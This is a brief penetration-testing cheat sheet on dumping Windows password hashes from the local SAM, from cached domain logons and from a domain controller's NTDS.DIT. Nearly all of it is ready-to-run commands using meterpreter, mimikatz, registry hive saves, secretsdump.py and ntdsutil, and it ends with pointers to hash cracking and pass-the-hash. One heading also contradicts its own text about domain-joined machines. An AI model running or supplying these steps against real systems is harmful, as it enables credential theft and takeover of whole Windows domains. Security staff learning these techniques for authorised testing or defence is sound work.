Resources:

Terminology

• SAM: Database file that contains local username and passwords (like /etc/shadow)

• NTDS.DIT: Database file that contains all Active Directory objects, stored on DC

• DC: Domain Controller

Prerequisites

NT AUTHORITY\SYSTEM (aka Administrator) is needed to dump credentials.

meterpreter > getsystem

mimikatz > privilege::debug
mimikatz > token::elevate

Non domain-joined machine

With domain-joined machines, passwords will be saved locally in C:\Windows\System32\config\SAM.

Returns: username:rid:lm:nt::::

meterpreter > hashdump

reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
secretsdump.py -sam SAM -system SYSTEM LOCAL

Domain joined machine

With a domain joined machine (that is not a Domain Controller) we can extract local passwords from SAM and also cached passwords (Mscash2).

Returns: username:hash::

meterpreter > bg
msf6 > use post/windows/gather/cachedump

mimikatz > lsadump::cache

reg save HKLM\SAM SAM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SYSTEM SYSTEM
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

Domain Controller

Having access to a Domain Controller (DC) gives us access to NTDS.DIT. We cannot copy this file normally, as it's always in use, but we can use ntdsutil or vssadmin.

Returns: domain\username:rid:lm:nt::::

meterpreter > bg
msf6 > use post/windows/gather/credentials/domain_hashdump

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
secretsdump.py -ntds NTDS.DIT -security SECURITY -system SYSTEM LOCAL

Next Steps

Cracking dumped Windows hashes

Pass-the-Hash (PtH) Attacks